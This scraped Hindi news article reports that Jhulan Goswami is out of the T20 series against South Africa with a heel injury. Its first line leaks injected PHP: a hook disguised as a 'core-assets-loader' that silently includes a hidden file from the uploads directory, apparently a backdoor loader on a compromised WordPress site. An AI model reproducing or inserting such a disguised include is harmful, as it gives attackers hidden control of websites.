add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); साउथ अफ्रीका के खिलाफ टी-20 सीरीज से बाहर हुई झूलन गोस्वामी – SOCH INDIA
Menu

खेल
साउथ अफ्रीका के खिलाफ टी-20 सीरीज से बाहर हुई झूलन गोस्वामी

nobanner

साउथ अफ्रीका के खिलाफ टी-20 सीरीज से पहले भारतीय महिला क्रिकेट टीम को बड़ा झटका लगा है. एड़ी की चोट के कारण भारत की अनुभवी तेज गेंदबाज झूलन गोस्वामी पांच मैचों की टी-20 सीरीज से बाहर हो गईं हैं.

बीसीसीआई ने एक बयान में कहा ,‘‘ झूलन को एड़ी में चोट लगी है और उसका आज एमआरआई कराया गया.’’

इसमें कहा गया ,‘‘ बीसीसीआई की मेडिकल टीम ने स्थानीय डाक्टर से सलाह के बाद यह पाया कि उसे कुछ सप्ताह आराम की जरूरत है. वापसी के बाद वह पैरों के विशेषज्ञ से बात करेगी और बेंगलूरू में एनसीए में रिहैबिलिटेशन शुरू करेगी .’’

इससे पहले झूलन ने तीन मैचों की वनडे सीरीज में पांच विकेट लिये. वह तीसरा और आखिरी वनडे नहीं खेल सकी थी.